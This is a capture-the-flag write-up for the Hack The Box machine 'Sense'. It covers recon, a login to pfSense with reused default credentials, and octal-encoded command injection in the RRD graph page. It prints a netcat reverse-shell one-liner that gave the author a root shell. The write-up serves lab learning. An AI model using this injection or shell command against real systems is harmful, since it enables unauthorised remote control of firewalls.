Hackthebox.eu - Sense - Retired - Updated
I've been using threader3000 for my recon scan on HTB. It does a staged scan, first it does a super quick up/down scan on all TCP ports then it takes the results of that scan and pipes it into a nmap scan. It automatically saves the results of the nmap scan as XML, which I then convert to HTML to make it pretty.
Just two ports open 80 & 443. It looks like 80 is lighttpd 1.4.35
When I try to browse using the dns name I added in my /etc/hosts
I get this message.
First it redirects me to HTTPS, then I get this error message
If I try it by ip address.
We get redirected to https again and this time we get a login page for pfsense.
Which is an open source firewall project.
A quick google search shows the default credentials for this should be
Username: admin
Password: pfsense
But that doesn't work.
Not much to go on now, let's see if there is anything else that might be on the web server by attempting to brute force for other directories and files, using dirb
Dirb found us some new directories, but not much to go forward with
So we still don't have much of anything to go on, let's try scanning with another tool and a different list to see if we can get some different responses. It's always a good idea to try multiple tools, and multiple lists.
This time I used Dirbuster and the list,
I added txt,html,conf,bak,sh to my search options to look for different file types too
And with the different list we did see a couple of new files
Changelog.txt and system-users.txt
Let's see what the changelog.txt has in it.
2 of 3 vulnerabilities have been patched, well that means there is one that hasn't right? Good news for us.
What about systems-user.txt
Ok looks like a ticket asking for an account named rohit to be created with the company default password…..
Now does that mean the company's Sense.htb's default password or the default password for the company that made the software?
We would have no idea what the internal default password for the Sense company might be, we did already find the default password setup by pfsense
Password: pfsense
Let's try logging in with
Username: rohit
Password: pfsense
It worked, lets see if we can figure out a ware to get code execution from this panel somewhere.

It took me a while to find a non-metasploit path forward here.
I eventually came across a couple of blogs.
The first is showing that the rrd graph is vulnerable to RCE because during the sanitation of the user input they neglected to strip out the "|" character which we can use to pipe other commands to. They also said that if you octal encode your payload you can also bypass the sanitaion all together.
So combining these we can use the pipe to get another execution of a command and if we octal encode our command we can then issue any command we want to.
I then found this site with a POC in python
I had trouble getting the POC to work but I did borrow from its code to create a little encoding python script for me to use.
Which will accept an argument from the command line and octal encode it, then reinsert it into what the finally URL call would be.
I wanted to start with a bit of a POC of my own. I just want to see if I can have sense ping back to my computer.
So first let's start up tcpdump to listen for ICMP on my VPN tunnel interface
Then with my little encoder script I named encoder.py
I encoded "Ping -c 4"
Which gave me the following output.
I copied that link into firefox and…..
We got ping back
So we have been able to use the RCE on pfense
So let's try netcat now to get a reverse shell.
First let's set up our listener.
Had trouble getting nc to work, I couldn't get a reverse shell back. I'm guessing at this point that nc is restricted somehow or a non-compatible version.
I tried a bunch of different interaction of a reverse shell and finally found one that worked on
Netcat OpenBsd
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f
So first thing is I modified it to be my VPN IP and port
So I piped that though the little encode.py
And I got this back as the encoded URL
And once that was pasted back into firefox
We got our shell as root.
Let's grab those flags and call it a day.
And just for grins and giggles I checked on the nc reverse shell I had problems with in the begining and saw this.
This version of netcat doesn't allow you to pipe to an executable using -e
Unlike most versions of netcat.
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